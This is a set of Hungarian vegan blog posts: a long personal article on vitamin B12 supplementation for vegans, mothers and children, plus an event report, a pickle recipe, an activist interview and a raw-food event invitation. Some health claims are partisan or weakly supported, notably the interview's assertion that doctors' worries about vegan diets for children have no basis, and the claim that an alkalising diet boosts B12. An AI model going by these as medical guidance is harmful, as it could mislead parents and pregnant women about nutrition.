A napokban a La Veganista (nem mellesleg kiváló!) blog szerzője írt a vegánság és a B12 vitamin kapcsolatáról. Nagyon jó a cikk, ajánlom mindenkinek elolvasásra! Engem is arra inspirált, hogy a már évek óta a piszkozatok mappában megbújó B12-es bejegyzést végre befejezzem.:) Hát íme, bízom benne, hogy hasznos infókhoz juttok belőle! A bűvös B12 és a vegán vegetáriánus A vas, a fehérje, és a B12... Általában ez a három leggyakrabban emlegetett ,,vesszőparipa a vegetáriánus étkezéssel kapcsolatban. Én személy szerint max. a legutóbbit tartom valós lehetőségnek kiegyensúlyozott vegán (azaz a hús mellett tejterméket és tojást SEM fogyasztó) táplálkozás esetén. Tehát, ha valaki lakto-ovo (eszik tejterméket és tojást, csak húst nem), vagy ovo (eszik tojást) vegetáriánus, akkor az ő esetében nem kell tartania a B12 vitamin hiányától, mert visz be állati eredetű élelmiszerekkel B12-t a szervezetébe! Az alábbi bejegyzésben igyekszem összegezni azokat az infókat, amiket az elmúlt évek alatt találtam, magyar és főként angol nyelvű vegán szakirodalmakban (igyekeztem a sok tudományos megfogalmazást minél egyszerűbb, hétköznapibb nyelvre fordítani:) . Noha a B12-vitamin pótlásának, fellelhetőségének kérdése még talán a vegán módon táplálkozókat is megosztja... Kiemelt hangsúlyt fektetek a bejegyzésben a vegán várandós anyukák és a vegán gyermekek szükségleteire. A legfontosabb információk forrásait megjelölöm a cikk végén. Mi is az a B12 vitamin? A B12 - vitamin egy vízben oldódó vitamin. Másik gyakran használt elnevezése a kobalamin, vagy a ciano-kobalamin. A tudomány mai állása szerint a B12 - vitamint csak baktériumok tudják előállítani, a növényekben nem található. Bár utóbbinak rögtön ellentmond, hogy egy svájci kutató, dr. A. Mozafar felfedezte, hogy a szójababban, az árpában és a spenótban jelen van a B12-vitamin, különösen akkor, ha ezek szerves trágyán növekedtek. Közleménye megrázta a tudományos világot és kérdések, illetve további kísérletek sorozatát indította el.[1] Érdekes tény, hogy a vastagbélben élő baktériumok képesek ezt a vitamint előállítani (emiatt vannak olyan vegán vélemények, miszerint ez a mennyiség, bizonyos élelmiszerekkel együtt elegendő a szervezetünk számára...). A probléma viszont az, hogy a vastagbélből már nem szívódik fel tápanyag, ezért sajnos ezt a mennyiséget nem tudjuk hasznosítani.[2] Az ott kialakuló B12 - vitamin 95%-a a szervezet számára hasznosíthatatlan. Lúgosító kémhatású táplálkozás esetén mégis magasabb a B12-t előállító bélbaktériumok koncentrációja, így több - minimálisan hasznosuló - B12 termelődik a szervezetben. A B12 - vitamin hatását folsav jelenlétében fejti ki .[3] A tápcsatornából csak egy bizonyos speciális fehérje segítségével képes felszívódni. Ennek hiányában, ún. felszívódási zavar következményeként, elégséges bevitel mellett is kialakulhatnak hiánytünetei. Mihez szükséges? Fontos szerepet játszik pl. - a vérképzésben - az idegrendszer zavartalan működésében - a sejtosztódásban. Hiánytünetek Megjegyzés, hogy a tünetek sok más ok következményeként is felléphetnek, de azoknál, akik vegán étrendet folytatnak, az egyéb okok kizárása után/ mellett esetleg iránymutató ez a lehetőség is... - vészes vérszegénység - idegrendszeri tünetek: érzés-, járászavar, feledékenység, levertség, depresszió, ingerlékenység - krónikus fáradtság, gyengeség, kimerültség - zsibbadás/ bizsergés érzés a végtagokban. Miből juthatunk vegán étkezés esetén B12 vitaminhoz TERMÉSZETES úton? A fent leírtak alapján erre vegánként elég kevés, illetve nem túl biztos lehetőségünk van...:) B12 - vitamint tartalmaznak a tejtermékek, illetve a tojás is, ezért az azokat fogyasztó ún. lakto - ovo vegetáriánusoknak nem kell aggódniuk a B12 vitamin hiánya miatt.:-) Illetve ugyanez érvényes azon főként vegán módon étkező vegetáriánusokra is, akik legalább hetente 2-3 alkalommal fogyasztanak - még ha kis mennyiségben is - tejterméket, vagy tojást (bár valójában a tehenek sem a szép zöld fűből jutnak hozzá a B12-höz, hanem a számukra beadott vitaminokkal dúsított takarmányokból, és így lesz a tej is B12 tartalmú...-erről mesélt egy ugyancsak vegán olasz gyermekgyógyász, dr. Michela De Petris egy vele készített interjúban). Természetes módon, az ételt szennyező ún. mikroorganizmusok megfelelő mennyiségű B12 - vitamin bevételt biztosíthatnak. Értsd ezalatt azt, hogy pl. a földből kihúzott, földesen elfogyasztott répa.:-) A vegánok közül sokan vannak, akik azt vallják, hogy az ily módon + az ételek által + a bélbaktériumok által előállított mennyiség elegendő a számukra. Ennek cáfolataként elgondolkodtató volt a számomra egy olasz vegán doktornővel készített interjú a témában, ahol viszont ő jogosan felvetette, hogy igen, de manapság ki az nálunk Európában, aki nem mossa meg a zöldségeket, gyümölcsöket feldolgozás, elkészítés előtt, és mossa le ezáltal a B12 szempontjából fontos mikroorganizmusokat?;-) A B12 felvétele ebben a formában így inkább valószínűleg a szegényebb higiénés körülményekkel rendelkező országokban helytálló (pl. gyakran emlegetik ebben az összefüggésben Indiát...). Erjesztett szójatermékek: pl. a tempeh, vagy a miso, melyek felületén baktérium termel B12-t, azonban ez nem feltétlenül megbízható forrás, mivel a termelt mennyiség függ a baktériumok számától. Spirulina alga és egyéb algafajták: hasonlóan az előzőekhez egyrészt igen kevés B12-t tartalmaznak, másrészt az utóbbi években igazolást nyert, hogy az ezekben az ételekben található B12 nem aktív, és valójában gátolja az aktív B12 felszívódását (4) Sörélesztőpehely, savanyú káposzta, kovászos uborka: nagyon sok vegán esküszik rájuk, én a fentiek miatt nem tartom őket megbízható, hosszú távú B12 forrásnak! Ja és a savanyú káposztán kívül amúgy ízre sem szeretem egyiket sem, nemhogy még napi szinten egyem is őket évekig...!:DDD És akkor ismét a legfontosabb kérdés:) MIBŐL NYERJEN B 12 VITAMINT A HOSSZÚ TÁVON VEGÁN ÉLETMÓDOT KÖVETŐ?:) 11. Először is, bármilyen étrendkiegészítő mellett is döntesz, elsősorban olyan megoldást keress, ahol a kobalamin a legfőbb összetevő, és nem egy sokféle vitamint tartalmazó vitaminkomplexum egyik összetevője, vagy mondjuk egy algás készítmény adaléka, stbstb.!! 22. Másik fontos dolog, hogy minél nagyobb mennyiségben tartalmazzon B12-t, mert nem mindegy, hogy mondjuk naponta 3x2 kapszulát kell bevenni, vagy mondjuk csak hetente 1-2x... Megjegyzés: az USA-ban már léteznek olyan vegán B12 vitaminkészítmények, amiket csak ilyen ritkán kell adagolni, itthon viszont még nem tudok ilyenről... (ha Te igen, ne tartsd Magadban!:) 33. VEGÁN TERMÉKET keress, ezt rá is szokták írni! Sokszor zselatint tartalmaz a kapszulák bevonata, ilyet ne vegyél! 44. Tudományos vizsgálatok alapján egy átlag embernél kb. 3-5 évig raktározódhat a szervezetben a B12, tehát ha most kezded a vegán életmódot, akkor nem kell kétségbeesve a pótlás után nézned!:) Persze, ha előtte is viszonylag kevés állati eredetű élelmiszert fogyasztottál, érdemes kicsit jobban odafigyelned! B12-vel dúsított élelmiszerek Főleg gyerekek esetében, gyakran szokták ezeket emlegetni, de én úgy gondolom, ez nem elég, kiegészítésnek viszont jól jöhet, illetve a vegánság kezdő időszakában/ évében esetleg még elegendő lehet...! - szójatej, és egyéb növényi tejek - növényi margarin - szójás termékek B12-vel dúsított fogkrém Pl. a Sante márkájú, de ez is csak max. kiegészítésre! Itthon is kapható! dr. Steinberger Eisenblut Plus gyümölcslékészítmény B 12-vel is dúsított vörös bogyós, vas-készítmény Kiegészítésnek, illetve a kezdeti időszakban kúraszerűen, kismamáknak a várandósság idején, ha csak nem rég lettek vegánok. B 12 Vitamin Spray ('Vitamist' márkájú) Ezt én is próbáltam, a nyelv alá kell fújni, naponta 2x. Nekem az nagyon nem megy, hogy hosszú távon minden nap v alamilyen kapszulát eszegessek, úgyhogy számomra ez egy elég jó alternatíva . 500 mcg B12-t tartalmaz. A pontos összetevőket és infókat ITT megtalálod hozzá! És Magyarországon is kapható! Mentolos ízű. Rágótablettás, vagy kapszulás B12 vitaminok Nagyon sokféle létezik már a piacon, a fentiek figyelembevételével nézz körbe! Akár külföldi oldalakon is, mint pl. a www.amazon.com. A szállítási költség nem szokott vészes lenni ilyen esetekben sem! VEGÁN KISMAMÁK ÉS VEGÁN GYEREKEK B12 vitamin szükségleteinek pótlása Kismamák: - ha már régóta vegán módon élsz, akkor ellenőriztesd az értékeid, és pótold a B12-t!:) - ha csak rövid ideje, netán a várandósság alatt tértél át a vegán étrendre (sokan vannak így, pl. én is így tettem a második terhességem alatt...:)), akkor valamilyen kiegészítőt már kezdj el szedni! Én végig a Steinberger Eisenblut Plus készítményt szedtem. - szoptatás alatt szintúgy! Gyerekek: - amíg szoptatsz, és Te figyelsz Magadra, Rajtad keresztül a baba is hozzájut a szükségeshez!:) - nagyobb gyerekek, de még nem elég nagyok...:)): tegyük fel, hogy abban az ideális helyzetben vagy (és miért ne sikerülne?;), hogy legalább a baba 1 éves koráig tudsz szoptatni. 1 éves kortól már használhatóak a gyerekek számára a Vitamist Vitamin sprayk, talán az a legegyszerűbb (nekik úgy emlékszem, elég napi 1x fújni). Ha a mentolos íz nem annyira jön be, akkor létezik olyan is, amelyik kifejezetten gyerekeknek szóló vitaminkomplexumos, annak legutóbb olyan kicsit gyömbéres íze volt. Az én gyerekeim mindkettő 15 hónapos koráig vegán volt, és addig még mind a kettőt szoptattam. A fiam kifejezetten szerette a Vitamin spray ízét, de a lányom nem annyira, viszont mivel a szoptatás alatt én használtam B12-t, nem volt probléma. Vannak olyan vegán anyukák, akik az élesztő-rágótablettára esküsznek, de az csak akkortól játszhat (ha úgy döntesz, hogy ez elég lesz), amikor már fogai vannak a csemetének és megbízhatóan tud rágni, nyelni. - és ha időközben rábukkansz olyan vegán B12 készítményre, amit hetente max. 1-2x kell beszedni, számukra még az is egy nagy előny lenne! HOGYAN ELLENŐRIZTESD A B12 vitamin értékeid? Bevallom, az utóbbi években én ezt magán laborokban szoktam intézni... Nem kell magyarázkodni, nagy monológot végighallgatni, hanem telefonálok, időpontot kérek és kész! Ilyenkor szoktam kérni egy teljes vérképet, a vas (ezt külön kell kérni), B12 és D-vitamin értékeket. Legutóbb egy ilyen komplex labor (2013.), vizeletvizsgálattal együtt 13.000 Ft-ba került, és 3 munkanapon belül megvolt az eredmény.... Nekem ez évente egyszer meg szokott érni ennyit...:) Azt meg szokták kérdezni, miért kérem, és olyankor elmondom, hogy vegetáriánus vagyok, és évente szoktam ellenőriztetni. Már szinte minden nagyvárosban, megyeközpontban vannak ilyen laborok, érdemes utánajárni! DE, ami FONTOS!: ezek a laboreredmények nem kerülnek kiértékelésre így ebben a formában, tehát csak annyi történik, hogy becsillagozzák a normál tartományokhoz képest eltéréseket. EZÉRT HA ILYEN eltérő ÉRTÉKET KAPSZ, FORDULJ ORVOSHOZ A TOVÁBBIAK érdekében! És még egy zárógondolat a blog talán eddigi leghosszabb cikke végére: Mindenki eldöntheti, mennyit ér meg a vegán életmód felvállalása. Számomra ez a pótlás teljesen bevállalható a vegán életmód rengeteg egyéb hosszútávú előnye mellett.... U.i.: a bejegyzés jelentős része az alábbi cikk feldolgozása alapján készült, mely az eddigi legátfogóbb cikk a vegánság és a B12 folyamatait illetően, nagyon sok, a 2000-es évekből származó tudományos tanulmány alátámasztásával: http://www.veganhealth.org/articles/vitaminb12 [1] Reisinger Orsolya: Mérlegen a vegetarianizmus [2] Házipatika.com [3] Reisinger Orsolya: Mérlegen a vegetarianizmus [4] www.veganhealth.org
Vegán délután a Liszt Ferenc téren
2013. november 2. La Veganista
A vegán világnap délutánján, egy aprócska vegán sziget nőtt ki a Liszt Ferenc tér aszfaltján. Az infóstandon szórólapok, könyvek, állatbarát kvíz és természetesen vegán kóstolni valók is helyet kaptak. Diós birsalmasajt, vöröslencse pástétomos szendvicsek, citromos-bazsalikomos tönkölypiskóta, magvakkal teli, aszalt energiaszelet, melyet lelkes önkéntesek készítettek. Blogunk is komolyan vette a vegán ünnepet. Igazi békebeli, ám veganizált almás pitével, kakaós és fahéjas csigával, valamint babpástétomos házi graham bagettel kínálta az érdeklődőket. Volt, aki kifejezetten bennünket keresett a téren. Így csatlakozott hozzánk Zsófi, a legfiatalabb vegán aktivista. Mindössze 12 éves, de már kilenc hónapja vegán. Családja elfogadta és komolyan veszi a döntését. Szülei, szívesen megfőzik kislányuknak a tápláló vegán étkeket. Zsófi választását barátai is tiszteletben tartják. Bár az iskolába az új rendelkezések miatt nem viheti be a saját ételét (ez mindenkire vonatkozik, nem a vegán ételeket tiltották ki a sulikból, hanem a házi kosztot), a napközi alól felmentést kapott, hogy otthon ehessen. Kedves élelmezésvezetők, gyerekek egészségéért aggódó dietetikusok, döntéshozók, nem lenne egyszerűbb, ha a köztudottan egészségesebb és alacsonyabb költségű húsmentes menüt bevezetnék a sulimenzákra? Amerikában már tudják, hogy jó hatással van a gyerekekre. Nem kellene legalább kísérleti jelleggel itthon is kipróbálni? Remélem, hogy a magyar főiskolákon már ott tanulnak a jövő vegán RD-i (regisztrált dietetikus), akik Virginia Messina példáját követve megváltoztatják majd a helyes táplálkozásról vallott hazai nézeteket. A változásra nagy szükségünk van elnézve a magyar szív és érrendszeri, a rák (Magyarországon a legrosszabb a halálozási statisztika a 34 OECD ország közül), az elhízási és a cukorbetegségi statisztikákat. Lehet azzal takarózni, hogy kevés a pénz az egészségügyben, vagy hogy a korai diagnózis segítené a túlélést. Valahogy mindig kimarad a gondolatmenetből, a növényi étrend preventív és gyógyító hatása, amit a helytelen táplálkozás okozta metabolikus szindróma esetén már felismertek és ajánlanak. Szerencsére az emberek egy része alapvetően nyitott a kérdésre, így infóstandunknál is mindig voltak érdeklődők, akik szívesen megkóstolták a vegán csemegéket. Sokan kitöltötték az állatbarát kvízt, és megdöbbenve szembesültek azzal, hogy a tojásipar élve darálja le a hím csibéket, vagy, hogy a borjakat már egy napos korukban elszakítják az anyjuktól. Volt, aki ez utóbbit tudta, mert korábban tejgazdaságban dolgozott. Szépen gyűltek az aláírások a cirkuszi állathasználat elleni petíciós íven is. Az egyik aláíró elmondta, gyermekkorában sokkolta a rácsok mögé kényszerített állatok látványa, ezért többé nem akarta, hogy cirkuszba vigyék a szülei. A kóstoltatás közben lehetőségünk volt beszélgetni az érdeklődőkkel, hasznos információkat kaptunk és adtunk. Kiderült, hogy sokan próbálkoztak már a vegán életmóddal. Akadt olyan, akit az orvosa beszélt le róla, mondván, hogy a vegán táplálkozásba bele fog halni. Mások a drága növényi tejeket kifogásolták. Ezt ott helyben többféle házi növényi tej recept megosztásával orvosoltuk. Sokan felvetették a vas, a kalcium, a protein és a B12 pótlás problémáját, amit az önkéntesek saját tapasztalataik és a rendelkezésre álló szakirodalom alapján készséggel megválaszoltak. A legjobb fejek a gyerekek voltak, akik hamar átvették a vegán életérzést. Ők tudták, hogy a kis bocinak az anyja mellett a helye, hogy a malac ugyanannyi szeretetet és tiszteletet érdemel, mint a kutya, hisz az érző lények között nem tehető különbség. Tisztában voltak azzal is, hogy az állatok nem önszántukból vannak a cirkuszban. A kóstoltató-állomásunk előtt nagy turistaforgalom zajlott, így időnként nemzetközi vizekre eveztünk angol nyelvű szórólapjaink segítségével. Volt akinek annyira megtetszett a vegán magyar almás pite, hogy Andrássy úti felfedező kalandja végén ismét visszatért a standhoz egy falatnyi kóstolóra. Ahogy számítottunk rá, a napvégére elfogyott minden vegán étel. Nem tudjuk, hogy lesznek-e akik áttérnek a vegán életmódra, de azt láttuk, hogy az emberek nyitottan állnak a kérdéshez, és megérinti őket az állatok szenvedése.
Édes-csípős jalapeno
2013. október 28. Vegetáriánus receptek
Vastag húsú jalapeno (egészen pontosan: Jalapeño) paprikát kaptunk, Csináljatok belőle savanyúságot! címszóval. Nem vagyok nagy savanyúság készítő (illetve eddig nem voltam), keresni kezdtem az eljárást, a felöntő lé receptjét. Egyetlen igazán használható receptet sem találtam magyar oldalakon. Végül egy angol oldalon majdnem (ld. lenn). Abban viszont nem tetszett, hogy hűtőben kell tárolni. Annak arányainak felhasználásával, majd némi nyomozás után (hány százalékos lehet a distilled white vinegar
?), valamint egy enyhe csavarral a technológiában és az összetevőkben születetett meg a következő. Remélem, annak, aki legközelebb ilyet készít már könnyebb dolga lesz.
Hozzávalók:
- 15 darab nagy jalapeno
- 2,5 dl víz
- 1,25 dl 5%-os almaecet
- 1,25 dl 5%-os ecet
- 4 ek cukor
- 2 ek só
- koriander
- mustármag
A jalapenot felkarikázzuk, majd félretesszük (macerás, főleg nagyobb mennyiségnél gumikesztyű használata javasolt). Az ecet: a fele almaecet, nincs vele gond, gyárilag 5%-os. A másik fele sima ecet, nekünk 20%-os volt itthon, negyedére kellett hígítani. A vizet és az ecetet összekeverjük a cukorral és a sóval, melegíteni kezdjük, kevergetve ügyelve arra, hogy minden eloldódjon. Ha felforrt a lé beletesszük a karikázott paprikát, belenyomkodjuk jól, hogy mindenütt ellepje a folyadék. Levesszük a tűzről és 10-15 percig fedő alatt állni hagyjuk.
Sterilizált üvegekbe néhány szem koriandert és mustármagot teszünk, majd kiszedjük a paprikát, lé nélkül, az üvegeket meg-megrázogatva, hogy minél több férjen. Az üres levet visszaforraljuk és a forró lével öntjük fel a paprikát az üvegekben. Az üvegeket lezárjuk és fejjel lefelé száraz dunsztba tesszük.
Néhány hétig érleljük.
Bliszkó Viktor
Forrás: http://www.simplyscratch.com/2013/05/easy-homemade-pickled-jalapenos.html
Vegán aktivisták: Bonifert Anna - Vegán Állatvédelem
2013. október 24. La Veganista
A blogban az eddig közzétett receptek és életmóddal kapcsolatos cikkek mellett szeretnék bemutatni egy-egy aktivistát, aki tevékenységével hozzájárul a veganizmus szélesebb körben való terjesztéséhez, népszerűsítéséhez. Első beszélgető partnerem a Vegán Állatvédelem frontembere. Bonifert Annát, talán sokan személyesen ismeritek, vagy találkoztatok már a nevével, cikkeivel előadásaival. Kedves, mosolygós fiatal lány, de ez ne tévesszen meg senkit, hiszen igazi harcos aktivista, aki nem fél síkraszállni az állatok jogaiért. Ha kell TV stúdióban, máskor egy autó tetején, megafonnal a kezében mondja el, hogy a modern kor emberének alapvető erkölcsi normájába nem fér bele az állatok árucikké tétele. La V.: Kérlek, segíts megvilágítani egy fontos kérdést azok számára, akik a téma iránt érdeklődnek: mi az a veganizmus? Milyen főbb irányzatai vannak? B.A. Különböző emberek különbözően értelmezik ezt a szót. Azok számára, akik a saját egészségük javítását tűzték ki célul, vegánnak lenni csupán annyit jelent, hogy nem fogyasztanak tejterméket és tojást sem. Ez nagyon jó, de vegánnak lenni ennél jóval többet jelent. Az ,,igazi vegánok olyan emberek, aki elutasítják az állatok használatát etikai alapon. Vagyis semmi olyan terméket vagy szolgáltatást nem vesznek igénybe, amihez állatokat tartanak fogva, szaporítanak, ölnek. La V.: Mióta vagy vegán és miért kötelezted el magad mellette? B.A.: Két és fél éve. Egyszerűen azért, mert nem akarom bántani az állatokat. Ehelyett amennyire csak tehetem, tenni akarok a fennálló rendszer ellen, ami őket tárgyként, eszközként kezeli. A fogyasztói bojkott, mint Gandhi óta tudjuk, a leghatékonyabb és legszelídebb módja a forradalomnak. La V.: Van példaképed a hazai vagy nemzetközi vegán szcénában, aki inspirálóan hat a működésedre? B.A.: Példaképem nincs, de az elején, amikor vegánná váltam Gary L. Francione írásai hatottak rám. La V.: Könnyű ma Magyarországon vegánként élni? Értem ezalatt a kulturális közeget, az állatokhoz való viszonyulást, vagy az elérhető termékeket. B.A.: Termékek szempontjából egyértelműen igen, fel se tűnik a hétköznapokban. Nem érzem, hogy bármi is hiányozna. Ma már sokkal több vegán termék van a boltokban, mint két éve és elég esélyes, hogy ez a tendencia érvényesül továbbra is. Az emberek többségének hozzáállásával együtt élni néha nehéz, de a helyzet itt is egyre javul. La V.: Vannak, akik szimpatizálnak a vegán életmóddal, de félnek belevágni, mert úgy érzik, hogy a környezetük csodabogárnak tartaná őket. Te tapasztaltál ilyesmit? Ha igen, hogyan kezelhető ez a probléma? B.A.: Sajnos igen. Ez az egyetlen nehézség, bár ez is csak azoknak, akiket érdekel, mások mit gondolnak róluk. Szerintem meg kell próbálni türelmesnek lenni a többi emberrel. Sosem könnyű forradalmárnak lenni, de a vegán életmód az erőszakmentesség forradalma, így teljesen nyilvánvaló, hogy a kommunikációs módszereinknek is erőszakmentesnek kell lennie. Szóval türelmesnek kell lenni és nem bántani, nem sértegetni a nem vegánokat még akkor sem, ha ők néha sértegetnek minket. Nem értik, miért vagyunk vegánok, de idővel meg fogják érteni. La V.: Milyen lehetőségei vannak az érdeklődőknek a közösségi élet területén? Milyen csoportokhoz fordulhat segítségért, támogatásért, milyen programokhoz csatlakozhat? B.A.: Ha olyan emberről van szó, aki használ facebook-ot, akkor nagyon könnyű dolga van, csak beüti a keresőbe a vegán szót és talál egy csomó csoportot és oldalt, ahol hasonló ,,felébredt emberekkel vitathatja meg a dolgokat. Ha pedig valódi találkozásra fáj a foga, akkor jöjjön el valamelyik filmklubra vagy nyáron a piknikre, ahol 30-40 vegán vagy majdnem vegán érdeklődő gyűlik össze, hogy egyen és beszélgessen. La V.: Több film készült, amely dokumentálja a vágóhidakon, a tejiparban, vagy a nagyipari állattartásban mindennaposnak számító brutalitást, és az állatok mérhetetlen szenvedését. Ezeket sokan lelki okok miatt nem nézik meg. Tudsz olyan a neten is elérhető filmet, előadást ajánlani, ami kíméletes, mégis hatásos formában informálja az embereket? B.A.: Igen, sőt, a véres, állatkínzós filmeket én sem tudtam soha végig nézni, és nem is hiszem, hogy mindenkinek szüksége lenne rájuk ahhoz, hogy vegán legyen. Szerintem nagyon sokan csak belekezdenek, aztán kikapcsolják és aztán fogyasztóként továbbra is részt vesznek a rémségekben. Amit első filmnek ajánlok, az a Making the connection , ennek magyarul az "Összefüggések" nevet adtuk. Ez egy 30 perces összefoglaló, bevezető, kedvcsináló. Nagyon minimális benne az ijesztő képsor, az is csak a vége felé. Utána van két előadás, ami nagyjából ugyanazt mondja el, csak más stílusban: egy karizmatikusabb, vadabb és egy barátságosabb, kedvesebb pasi. Érdemes mind a kettőbe belehallgatni és utána eldönteni, melyik a szimpi. Mind a kettő nagyon jó! A legjobb beszéd, amit valaha hallottál - Gary Yourofsky Az igazi Mátrix - 101 ok, hogy a piros tablettát vedd be La V.: Térjünk most át egy kényesebb kérdésre. Sokakban felmerül a kétely a vegán étrend egészségességével kapcsolatban. Hallottam már arról is, hogy némely orvosok gyerekek számára egyenesen károsnak tartják és megtiltják a vegán vagy a vegetáriánus étrendet. Van ennek alapja? B.A: Semmi. Nagyon szomorú, hogy az orvosok többsége ilyen téves információkat tanult és terjeszt. Ezzel nem csak a vegán mozgalomnak árt, de a betegeinek is. A vegán étrend pont, hogy sokkal egészségesebb, mint egy vegyes vagy egy vegetáriánus. Éppen ezért sokan pont emiatt választják, nem is etikai alapon, ahogy már fentebb beszéltünk róla. Akit ez érdekel, annak ajánlom a Kína tanulmány című nemrég megjelent könyvet, melyben egy vegán orvos összegzi 30 év kutatásait táplálkozás témában. Magyar nyelven ez a legjobb, ami elérhető. Angolul jóval több van. La V.: Ha már az egészségnél tartunk, személy szerint te tapasztaltál egészséggel kapcsolatos előnyt, vagy hátrányt az átállás után? B.A.: Azt, hogy azóta nem vagyok beteg és hogy nem fáj a gyomrom. Ugyanezt hallom másoktól is. Több az energiánk, nagyobb az állóképességünk és le is adunk plusz kilókat, ha voltak. La V.: Szeretnék feltenni egy személyes kérdést, ha nem bánod. Néha konfliktusokat okozhat egy párkapcsolatban, ha eltérő étrendet követnek, hiszen az eltérő értékrendet is jelenthet. A te párod elfogadja, hogy a vegán életmódot mellett döntöttél? Mit tanácsolnál azoknak, akiknek ez konfliktust okoz a mindennapokban? B.A.: A régi párommal volt ebből konfliktus, mert ő vegyes étrenden élt. Eleinte piszkált a dologgal, hülyeségnek tartotta. Nem akartam vitázni, ezért arra kértem, nézze végig az Earthlings (Földlakók) című filmet, utána beszéljünk róla. Ez a leghosszabb és legrealistább film az állatok használatáról. Végig nézte és úgy állt föl, hogy többé nem eszik húst. Pár hónappal később pedig vegán lett és bár már jó ideje külön vagyunk, továbbra is az. A jelenlegi barátomat pedig a vegán pikniken ismertem meg, így ez a kérdés már fel sem merült. De a lényeg itt is, mint mindenütt, hogy kitartsunk a saját elveink mellett és türelmesek legyünk másokkal. La V.: A vegán filozófia sarkalatos pontja az állati termékek használatának mellőzése, szervesen illeszkedik hozzá a vegán állatvédelem fogalma. Ezzel kapcsolatban létrehoztál internetes oldalt , facebook közösséget , melynek több mint ezer követője van, könyvet írtál , előadásokat tartasz , publikációid jelennek meg . Mi motivált erre? Mi a különbség a hagyományos és a vegán állatvédelem között? B.A.: Amit a többség állatvédelemnek hív, az kutya-, és macskavédelem. Ez nagyon fontos dolog, én is hosszú éveket töltöttem kutyamentéssel és jelenleg is lakik nálam ideiglenes gazdikereső cica. Azért váltottam mégis az állathasználat ellen való küzdelemre, mert itt jóval nagyobb szükség van elkötelezett emberekre. Sokkal inkább gyerekcipőben jár a dolog és nehezebb is. Nem látja még az emberek többsége, hogy kutya és disznó, vagy macska és tehén között nincs olyan különbség, ami indokolná azt, hogy az egyiket szó nélkül leöljük, a másikat nem. Az a dolgunk, hogy ezt megmutassuk az embereknek és persze azt is, hogy vegánként élni könnyű és egészséges. Ez olyan dolog, amit a legtöbb kutyamentőnek és macskamentőnek is még meg kell értenie. La V.: Milyen terveid vannak a közeljövőt illetően? Előadások, általad szervezett események, esetleg egy új könyv megjelentetése? B.A.: Igen, dolgozom most egy új könyvön, ami az elsővel ellentétben nem kifejezetten az állatbarátokhoz fog szólni. A vegán életmód 4 fő motivációját szeretném áttekinthetően vázolni: környezetpusztítás, éhezés a harmadik világban, állatvédelem és egészségmegőrzés. Remélem, hogy ez tágabb közönséghez jut el és olyanokat is meggyőz, akiket az Állatvédők Könyve nem érintett meg. La V.: Lesz Magyar Vegán Társaság? Te is alapítók között vagy, ezért kérlek, informáld a blog olvasóit arról, hogy hol tart a folyamat, mik a szervezet céljai? B.A.: Hivatalosan még nem alakultunk meg, de már van honlapunk és vannak futó projektek. Fő célunknak tartjuk az ismeretterjesztést, és hogy segítsük azokat, akik nyitottak, akik szeretnének vegánok lenni. Erről szól például a VegaNinja program, amiről az oldalunkon olvashattok! La V.: Közeleg a vegán világnap, amit november első napján ünneplünk. Lesz-e ehhez kapcsolódóan esemény, amire érdemes ellátogatni vegánnak és nem vegánnak egyaránt? B.A.: Csinálunk egy infó standot az Oktogonnál 14:00 órától sötétedésig, ahol finom sütikkel és egyéb kóstolókkal várjuk az érdeklődőket. Lesz nálunk vegán szóróanyag, cirkuszi állathasználat ellenes aláírás gyűjtőív, állatvédő totó, vegán kitűzők, matricák... de amit a legjobban szeretnénk: beszélgetni az emberekkel, segíteni az érdeklődőknek. Biztos lesz járókelő, aki majd megáll és talán aznap hall először arról, hogy lehet állatok használata nélkül élni. La V.: A La Veganista blog azt tervezi, hogy időnként megszólaltat egy-egy embert, aki tevékenységével, személyes példájával elősegíti a vegán életmód és eszmerendszer szélesebb körben való megismertetését. Te kit ajánlanál? B.A.: Elsőként Stőhr Gréta profi vegán chef jut eszembe, idén jelent meg a könyve, ami jóval több mint egy vegán szakácskönyv, inkább életmód tanácsadónak mondanám. Gréta nagyon-nagyon sokat tesz a vegán életmód népszerűsítésért és sokat segít az embereknek. La V.: Köszönöm a beszélgetést! Új könyved megírásához sok siker kívánok! Remélem, nagyon sok emberhez eljut majd a benne megfogalmazott üzenet.
Ízek és anyagok találkozása
Kifutó a konyhában, azaz a vegakonyha találkozása a magyar divattal.
Meghívó: b.alive! Boris Lauser Magyarországon Szept.27-28.
2013. szeptember 16. Répa Konyha
AZ ÉLETKONYHA BEMUTATJA: Egyedülálló lehetőség - 2013. Szeptember 27-28. Budapestre látogat b.alive! Boris Lauser (http://www.balive.org/), Európa egyik legismertebb, legképzettebb és legtehetségesebb nyers vegán séfje. Boris a Tree of Life Intézet (http://www.cultureoflifeinstitute.org/) képzett Spirituális élő étel oktatója. Nemrég diplomát szerzett a világ egyetlen professzionális nyers vegán séf akadémiáján, a Matthew Kenney Akadémián. (http://matthewkenneycuisine.com/education/) Kifinomult ízlésvilága, széleslátókörű hozzáállása -mely világszerte tett utazásainak köszönhető- teszik egyedülállóvá munkáját. A világ különböző tájain szervez sikeres táborokat, tanfolyamokat, valamint híresek berlini nyers vegán gourmet vacsora estjei is. Két programon is részt vehettek: 2013. szeptember 27. 18.00-21.00 óra BORIS LAUSER ELŐADÁSA Az előadás témái közül néhány: -Úton a nyers vegán étkezés felé -Hogyan találjuk meg egyensúlyunkat ebben az étrendben -Az egészséges, kiegyensúlyozott életvitel kialakítása -A nyers vegán étkezés jövője- fermentálás, csökkentett magfogyasztás -Technikák a nyers vegán étkezés könnyedebbé tételére -Meglepetés kóstolók ételkészítési bemutatóval Részvételi díj: 2100 Ft/fő Az előadás angolul és magyarul (tolmáccsal) fog elhangzani. Max létszám: 40 fő Regisztráció: az alábbi elérhetőségeken Szeptember 25. Szerda éjfélig. 2013. szeptember 28. 18.30 óra B.ALIVE NYERS VEGÁN GOURMET VACSORA Ennek a különleges vacsorának a menüjében Boris az őszi természet színeit, illatait és ízeit komponálja meg az ő kifinomult stílusában, 4 könnyed, olaszos fogásban. Részvételi díj 8000 Ft/fő Max létszám: 20 fő Regisztráció: Szeptember 25. Szerda éjfélig. A regisztráció mindkét eseményre a részvételi díj átutalásával válik teljessé. Részletek és regisztráció: Repka Ágnes: 06-70-702-8187 Kassai Nóra Virág: 06-30-399-4912 info@eletkonyha.hu Kedvezmény! Gyere el mindkét alkalomra és összesen 9000 Ft-os áron vehetsz részt az előadáson és a vacsorán együttesen! www.eletkonyha.hu
Magyar ízek utcája - 2013
